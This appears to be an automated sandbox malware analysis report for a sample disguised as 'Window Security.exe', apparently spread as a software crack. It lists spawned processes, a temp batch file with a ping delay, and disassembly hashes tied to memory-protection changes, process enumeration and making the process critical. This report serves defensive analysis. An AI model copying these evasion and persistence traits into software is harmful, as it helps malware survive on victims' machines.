                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:93
                                                  Start time:00:17:03
                                                  Start date:03/09/2024
                                                  Path:C:\Users\user\AppData\Roaming\Window Security.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Roaming\Window Security.exe"
                                                  Imagebase:0x2a0000
                                                  File size:547'328 bytes
                                                  MD5 hash:81B2C5C64951B603480D40D321540FF2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:94
                                                  Start time:00:17:05
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Q83dEbLbhfIH.bat" "
                                                  Imagebase:0x790000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:95
                                                  Start time:00:17:06
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:96
                                                  Start time:00:17:06
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\chcp.com
                                                  Wow64 process (32bit):true
                                                  Commandline:chcp 65001
                                                  Imagebase:0xb10000
                                                  File size:12'800 bytes
                                                  MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:97
                                                  Start time:00:17:06
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\PING.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:ping -n 10 localhost
                                                  Imagebase:0x830000
                                                  File size:18'944 bytes
                                                  MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:134
                                                  Start time:00:18:04
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\Conhost.exe
                                                  Wow64 process (32bit):
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:
                                                  Has administrator privileges:
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Disassembly

                                                  Reset < >

                                                    Executed Functions

                                                    Function 00007FF848F10DD0 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2011253921.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff848f10000_BTC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: H
                                                    • API String ID: 0-2852464175
                                                    • Opcode ID: 5802722c928ce9b3205f28f1d37f33bebd8e8067708e32cacf5a308cadb1538a
                                                    • Instruction ID: 4c27b736a3bdceb9be714133cf0389aa9d8a937f4753ec497247b41877ab32b6
                                                    • Opcode Fuzzy Hash: 5802722c928ce9b3205f28f1d37f33bebd8e8067708e32cacf5a308cadb1538a
                                                    • Instruction Fuzzy Hash: 7531786284E3D25FC30367745C764A17FB09E57250B0A44EBD8C4CF4E3D61C699AC726
                                                    Function 00007FF848F104B5 Relevance: .6, Instructions: 636COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2011253921.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff848f10000_BTC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3b1158b2ef98ae209c80a985420c97e193ca98b279499430fad95ec5e43fee44
                                                    • Instruction ID: 32639db39108b2648a0aa5592e317961bad751352b2446affe0f29a85cdd69e4
                                                    • Opcode Fuzzy Hash: 3b1158b2ef98ae209c80a985420c97e193ca98b279499430fad95ec5e43fee44
                                                    • Instruction Fuzzy Hash: 52614A31F1E9569FE744FB6894A56B9BBF0FF99750F1400BAD408C32C6DE28AC028355
                                                    Function 00007FF848F1110D Relevance: .4, Instructions: 443COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2011253921.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff848f10000_BTC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d3fbc92198a052b6e14cd0c510228d7f5e56c61044e27c71f8b01cfbcb9f80d2
                                                    • Instruction ID: 06407a8cd06def9160d6c61151dee9c588e91bb0309f5cc3ab66ab42d9520f26
                                                    • Opcode Fuzzy Hash: d3fbc92198a052b6e14cd0c510228d7f5e56c61044e27c71f8b01cfbcb9f80d2
                                                    • Instruction Fuzzy Hash: 2541CD31E0DA899FE785EB7898692B9BBD1FF59740F0800BBD44DD31D7EA289C458341
                                                    Function 00007FF848F10A41 Relevance: .2, Instructions: 213COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2011253921.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff848f10000_BTC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 93cdff0b345a506b5fb79a81ff26f2754865322ff98f3feb891697dfee7335a9
                                                    • Instruction ID: fb66c9dec05f974153e24b6a87e6f13a8bdae1fbf0972f50858496bd61292140
                                                    • Opcode Fuzzy Hash: 93cdff0b345a506b5fb79a81ff26f2754865322ff98f3feb891697dfee7335a9
                                                    • Instruction Fuzzy Hash: D9715230A189198FEB98FB28D498BADB7E2FF94354F544179E41AD32D1CF38AC418B44
                                                    Function 00007FF848F10498 Relevance: .1, Instructions: 92COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2011253921.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff848f10000_BTC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d8e1ba6b5ff1d803073217838cc94add454d2d360b3c944c757ce98f35a0d1c8
                                                    • Instruction ID: c5d5126eca2f50d7008413e9b1d28ec793cf59c5bb8c27e9ebf5a8890f3651d9
                                                    • Opcode Fuzzy Hash: d8e1ba6b5ff1d803073217838cc94add454d2d360b3c944c757ce98f35a0d1c8
                                                    • Instruction Fuzzy Hash: E321A131B1994D9FEB94FB3884996BDB7D2EF99745B04007AE40ED3297DE24AC418740
                                                    Function 00007FF848F10F49 Relevance: .1, Instructions: 64COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2011253921.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff848f10000_BTC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5c7cfd7881ee53d2db76be4d0f03138182545dacbfaeedf5a47e74ae0f835ca4
                                                    • Instruction ID: db121888344c382de24e9d7b8c9db1d98b9a9760200bf7df7cf32c367a0686aa
                                                    • Opcode Fuzzy Hash: 5c7cfd7881ee53d2db76be4d0f03138182545dacbfaeedf5a47e74ae0f835ca4
                                                    • Instruction Fuzzy Hash: E9012231E1E9958FE358B77818AA2B4BBD1EFDA780F0900BAD40DC32D7DE185C468341
                                                    Function 00007FF848F104A0 Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2011253921.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff848f10000_BTC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f4849e93dd4307e404ab46129095d6577c060b5e531059b9bac040d71dbec07b
                                                    • Instruction ID: 056a4f4d1907e38ab3778b1defc59ca0fa320ed032724cdf45d3b7981a32c02d
                                                    • Opcode Fuzzy Hash: f4849e93dd4307e404ab46129095d6577c060b5e531059b9bac040d71dbec07b
                                                    • Instruction Fuzzy Hash: F8F0F431F2E8199FE7A8767D189A2B9A7D6DFE8B90F140039E40DC32D9DE285C424245
                                                    Function 00007FF848F10EC1 Relevance: .1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2011253921.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff848f10000_BTC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 42ab2f12a8faac9978ee77717124a2bf6963995fec731cb8cfa88e88e451d048
                                                    • Instruction ID: dd469b3133fa9896d6bf75a09e998925fb8c80b8e542a562987ed9d4a9eb4100
                                                    • Opcode Fuzzy Hash: 42ab2f12a8faac9978ee77717124a2bf6963995fec731cb8cfa88e88e451d048
                                                    • Instruction Fuzzy Hash: 8F017130B2EA858FD358B728985666833C0EF88750F0009BAC949C72C6DE28EC42C785
                                                    Function 00007FF848F104A8 Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2011253921.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff848f10000_BTC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7c3f403a952f306d75e845f60630e7dbee160eaa1a07c6b1e371f4b71f7aa145
                                                    • Instruction ID: 2a725b77519808e694ec84a14a017774724c50ab94fe44f20b658f82e1149363
                                                    • Opcode Fuzzy Hash: 7c3f403a952f306d75e845f60630e7dbee160eaa1a07c6b1e371f4b71f7aa145
                                                    • Instruction Fuzzy Hash: ABF0283072EA155FD758B73C940267A33D1EFC8754F100979D94DC7286CE2CB8428784
                                                    Function 00007FF848F104B0 Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2011253921.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff848f10000_BTC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9c2030d9d94031e95c51c9f7dc2b4b7824563c3eac45876c761717bcc43590ab
                                                    • Instruction ID: 4ec14dc400391601e56eb57cd2775de2ce976f04af0ab38dd1c4199b93790775
                                                    • Opcode Fuzzy Hash: 9c2030d9d94031e95c51c9f7dc2b4b7824563c3eac45876c761717bcc43590ab
                                                    • Instruction Fuzzy Hash: 93F0F43072D9195FD658B728940667933D1EBCCB44F000539D90EC3388DE28A8428B85

                                                    Executed Functions

                                                    Function 00CB08AF Relevance: .1, Instructions: 132COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2043538565.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_cb0000_crack.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b5c20a622ad259f76207756f15d8e0fb445b815c22ef9bee29f09b14f5a21a92
                                                    • Instruction ID: a24cb93b401487bbbbc50a200c84586029add793ba6148d9b8ea312b20458873
                                                    • Opcode Fuzzy Hash: b5c20a622ad259f76207756f15d8e0fb445b815c22ef9bee29f09b14f5a21a92
                                                    • Instruction Fuzzy Hash: D7418471710315DFCB09ABB9E9187AE3BAEEFC8700F104869A409837B9DE385C06C795
                                                    Function 00CB1869 Relevance: .1, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2043538565.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_cb0000_crack.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c04c0c89a92a9f5a35d106adc2cac57a4785f7c3d92bb8cfe93c66e446b3008d
                                                    • Instruction ID: 3805320a44c9db5b1a72cf5fc74667bb744751fec92868634b4925b056a22619
                                                    • Opcode Fuzzy Hash: c04c0c89a92a9f5a35d106adc2cac57a4785f7c3d92bb8cfe93c66e446b3008d
                                                    • Instruction Fuzzy Hash: 02410B357106058FC744EF68D4A4AAE7BF2BF8D614B2544A9E406DB3B5CF749C01CB91
                                                    Function 00CB0F54 Relevance: .1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2043538565.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_cb0000_crack.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ff6d5afdfd71aafd3d9a929ef373450bddd6ae07565ade8e7e4dc2549299bf01
                                                    • Instruction ID: c1837c38929f0a65103f019a5b8a626ecfdac532e234c666aabea6c74e94511c
                                                    • Opcode Fuzzy Hash: ff6d5afdfd71aafd3d9a929ef373450bddd6ae07565ade8e7e4dc2549299bf01
                                                    • Instruction Fuzzy Hash: 6E11B4307003089BDB096B79A5657FF69AB9BC8340F20042DE806A73E9CE794D499B95
                                                    Function 00CB0F58 Relevance: .1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2043538565.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_cb0000_crack.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0a3a805cd137a9eca86618400b222d4caf0265faa9c9dfa05d32212fe9d68ca4
                                                    • Instruction ID: ec01557b667c1c6ce2ba7c23dfd1d9b61b97d2e701638a5945cf234f63aa9ed6
                                                    • Opcode Fuzzy Hash: 0a3a805cd137a9eca86618400b222d4caf0265faa9c9dfa05d32212fe9d68ca4
                                                    • Instruction Fuzzy Hash: F411E2307003089BDB096B79A9657AF79EF9BC8340F20042DE806A73A9CE7D4D499BD5
                                                    Function 00CB0AB8 Relevance: .0, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2043538565.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_cb0000_crack.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 73bd68f628c16659686f9e54a65de341d26ade16686edc1687ccaf1eff592cea
                                                    • Instruction ID: 1f77850103ff37442573b9ce653b1871f9bf14827e6c163a684aef4d93c1436a
                                                    • Opcode Fuzzy Hash: 73bd68f628c16659686f9e54a65de341d26ade16686edc1687ccaf1eff592cea
                                                    • Instruction Fuzzy Hash: DCF09A70A00208CBDB14EF95D9197EF7AF1AB88704F300459E412B7390DBBA0E00CBE6
                                                    Function 00CB0AB3 Relevance: .0, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2043538565.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_cb0000_crack.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 346e361f64802fc2fc4261bcf6cca97c40a4eb0cb421f9c8c51f9d7786d1c389
                                                    • Instruction ID: 755bbc25cff4777f0dddc9001769d121af5b4ed7d3341ee5fb2e68e456538bcd
                                                    • Opcode Fuzzy Hash: 346e361f64802fc2fc4261bcf6cca97c40a4eb0cb421f9c8c51f9d7786d1c389
                                                    • Instruction Fuzzy Hash: B0F06D70605248CBDB14DF95E9187EE7FB1AB88704F300569E412B62A4DBB50E04DBA6
                                                    Function 00CB19BA Relevance: .0, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2043538565.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_cb0000_crack.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cf1a786631b93fd4a8252ff348091ee861e984d05ec85fd98566b69b53cb8b7f
                                                    • Instruction ID: bcec243fe74d2b9e14cdd7a3c027629e6301a0d319af261e313a52f2e6fe8bfd
                                                    • Opcode Fuzzy Hash: cf1a786631b93fd4a8252ff348091ee861e984d05ec85fd98566b69b53cb8b7f
                                                    • Instruction Fuzzy Hash: 6BE048316487D48ED721D678D4153DEBBE2DF85318F0405ADD1995B642C7BB790883B2
                                                    Function 00CB0841 Relevance: .0, Instructions: 8COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2043538565.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_cb0000_crack.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bc9295cd2ff796ecfdfbc7f84a3b7db7e695fcde548bab03c1f3f3168568f17c
                                                    • Instruction ID: 538cb4d50c3f8c600f7c528d17b655ee95aa81ad1b0bac840db745c93337707b
                                                    • Opcode Fuzzy Hash: bc9295cd2ff796ecfdfbc7f84a3b7db7e695fcde548bab03c1f3f3168568f17c
                                                    • Instruction Fuzzy Hash: A8C09B7555C1849FCB269B70FCAC6CC3F205D65211F55015EE84B91D71E6555513CF01
                                                    Function 00CB0848 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2043538565.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_cb0000_crack.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6090d30ff18a492b10e294f1f8fc8dda70057a847f9499260cb585086ad0f58a
                                                    • Instruction ID: 31c0efa467a1c30198e3f152377f7e6495367cb65a927609143441995022940c
                                                    • Opcode Fuzzy Hash: 6090d30ff18a492b10e294f1f8fc8dda70057a847f9499260cb585086ad0f58a
                                                    • Instruction Fuzzy Hash: 22A011300202088B822A2BA0FC0CB8C3B2CAA08202B800022A00E80C20AA2028028A80

                                                    Execution Graph

                                                    Execution Coverage:27.1%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:39.4%
                                                    Total number of Nodes:33
                                                    Total number of Limit Nodes:2
                                                    execution_graph 2589 7ff848f045f5 2591 7ff848f0460f 2589->2591 2590 7ff848f04737 Process32First 2592 7ff848f04743 2590->2592 2591->2590 2591->2592 2593 7ff848f04a25 2594 7ff848f04a4f RtlSetProcessIsCritical 2593->2594 2596 7ff848f04ae0 2594->2596 2615 7ff848f04845 2616 7ff848f04853 FindCloseChangeNotification 2615->2616 2618 7ff848f04914 2616->2618 2619 7ff848f044be 2620 7ff848f044cb CreateToolhelp32Snapshot 2619->2620 2622 7ff848f04568 2620->2622 2597 7ff848f03b8d 2598 7ff848f03b9c 2597->2598 2599 7ff848f03cd3 2598->2599 2602 7ff848f03cd5 2598->2602 2605 7ff848f03d0e 2599->2605 2601 7ff848f03ceb 2603 7ff848f03d0e NtProtectVirtualMemory 2602->2603 2604 7ff848f03cf5 2603->2604 2607 7ff848f03d30 2605->2607 2606 7ff848f03efb 2606->2601 2607->2606 2608 7ff848f04084 NtProtectVirtualMemory 2607->2608 2609 7ff848f040c5 2608->2609 2609->2601 2623 7ff848f028cd 2624 7ff848f028d5 CreateToolhelp32Snapshot 2623->2624 2626 7ff848f04568 2624->2626 2610 7ff848f03d88 2611 7ff848f03dbc 2610->2611 2612 7ff848f03efb 2611->2612 2613 7ff848f04084 NtProtectVirtualMemory 2611->2613 2614 7ff848f040c5 2613->2614

                                                    Executed Functions

                                                    Function 00007FF848F03D0E Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 482nativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2305098657.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f00000_Cracked.jbxd
                                                    Similarity
                                                    • API ID: MemoryProtectVirtual
                                                    • String ID: cV_H
                                                    • API String ID: 2706961497-633494986
                                                    • Opcode ID: c2852466e2c4261e7d378d7960df7e03d5e38289a7d23a2a6b6ef4bc6b2efd6e
                                                    • Instruction ID: 91291507d2097aa3da640f1554061327cf4aeb500f74b9c180f66200f4084a27
                                                    • Opcode Fuzzy Hash: c2852466e2c4261e7d378d7960df7e03d5e38289a7d23a2a6b6ef4bc6b2efd6e
                                                    • Instruction Fuzzy Hash: 09D14931E1DB495FE71DAB3898562FA77E1EF96350F0441BED08AC31D7EE2868068781
                                                    Function 00007FF848F028CD Relevance: 1.6, APIs: 1, Instructions: 115processCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 96 7ff848f028cd-7ff848f028d9 98 7ff848f028f6 96->98 99 7ff848f028db-7ff848f028f5 96->99 100 7ff848f028f7-7ff848f04566 CreateToolhelp32Snapshot 98->100 99->98 99->100 104 7ff848f0456e-7ff848f0458a 100->104 105 7ff848f04568 100->105 105->104
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2305098657.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f00000_Cracked.jbxd
                                                    Similarity
                                                    • API ID: CreateSnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 3332741929-0
                                                    • Opcode ID: 7d90b7c4aed37c2fa4e0fc812608445925b7c70809b96b77d3b6e12e602574c2
                                                    • Instruction ID: c364da192d9a1edda631fdaa29985acde3c6171c88bf03cd6947f4c8660c21de
                                                    • Opcode Fuzzy Hash: 7d90b7c4aed37c2fa4e0fc812608445925b7c70809b96b77d3b6e12e602574c2
                                                    • Instruction Fuzzy Hash: 4831243190C6489FDB15EF98D88A6EA7BF0EF56320F10017FD049C3153DB686845CBA5
                                                    Function 00007FF848F045F5 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2305098657.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f00000_Cracked.jbxd
                                                    Similarity
                                                    • API ID: FirstProcess32
                                                    • String ID:
                                                    • API String ID: 2623510744-0
                                                    • Opcode ID: 3c2cdf8f61c6b5bf3b0433bbd8730c994270351d9b7bbf019d1fca6360361a6d
                                                    • Instruction ID: fe3f60477e2b917506bc1b2b29cf76a380ad5bcc71af72bedc17ce18fa3533f1
                                                    • Opcode Fuzzy Hash: 3c2cdf8f61c6b5bf3b0433bbd8730c994270351d9b7bbf019d1fca6360361a6d
                                                    • Instruction Fuzzy Hash: F051C631D0DA1D8FEB69EB18D845BE977F0FB66314F0001AAD00DD3282EB7599858F81
                                                    Function 00007FF848F04845 Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2305098657.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f00000_Cracked.jbxd
                                                    Similarity
                                                    • API ID: ChangeCloseFindNotification
                                                    • String ID:
                                                    • API String ID: 2591292051-0
                                                    • Opcode ID: 881ba0581588184ff60139bdd1ed3b55070622bf8ef34fe089603789b0f6f6a2
                                                    • Instruction ID: fe64d537bd3096c478c676a8564d525508acfe84d4dcbe6fe32c511b09231115
                                                    • Opcode Fuzzy Hash: 881ba0581588184ff60139bdd1ed3b55070622bf8ef34fe089603789b0f6f6a2
                                                    • Instruction Fuzzy Hash: EA31263090CA899FDB19DB6888467F9BFE0FF66321F04426ED089C31A2DB64A456CB51
                                                    Function 00007FF848F04A25 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 89 7ff848f04a25-7ff848f04ade RtlSetProcessIsCritical 93 7ff848f04ae6-7ff848f04b08 89->93 94 7ff848f04ae0 89->94 94->93
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2305098657.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f00000_Cracked.jbxd
                                                    Similarity
                                                    • API ID: CriticalProcess
                                                    • String ID:
                                                    • API String ID: 2695349919-0
                                                    • Opcode ID: 2c08fa45a835b5b0290b7792510c07f2bd5e7af584e86cb845c4d79ed85d442f
                                                    • Instruction ID: d3842b5eba7c6de3d5b78a3ce32cfd240ea25a9ccb537170a158bd7d9d395256
                                                    • Opcode Fuzzy Hash: 2c08fa45a835b5b0290b7792510c07f2bd5e7af584e86cb845c4d79ed85d442f
                                                    • Instruction Fuzzy Hash: 95310A3144D7884FD719EBA8DC49AFA7BF0EF5A310F04016FE08AC3563CA686846CB55
                                                    Function 00007FF848F044BE Relevance: 1.6, APIs: 1, Instructions: 103processCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 106 7ff848f044be-7ff848f04566 CreateToolhelp32Snapshot 111 7ff848f0456e-7ff848f0458a 106->111 112 7ff848f04568 106->112 112->111
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2305098657.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f00000_Cracked.jbxd
                                                    Similarity
                                                    • API ID: CreateSnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 3332741929-0
                                                    • Opcode ID: 47c2bfddfa11cbf30422362663d37331eff3577a102eb4813006491f76463849
                                                    • Instruction ID: 3778129145dfd6a311511f751fd63ea1c5a3b76064de303f28bf8b9c39d0a22f
                                                    • Opcode Fuzzy Hash: 47c2bfddfa11cbf30422362663d37331eff3577a102eb4813006491f76463849
                                                    • Instruction Fuzzy Hash: 2521D27090C6489FEB18EFA8D88A6F97BF0EF5A320F04416FD449D7253DB64A845CB52

                                                    Non-executed Functions

                                                    Function 00007FF848F03D88 Relevance: .2, Instructions: 155COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
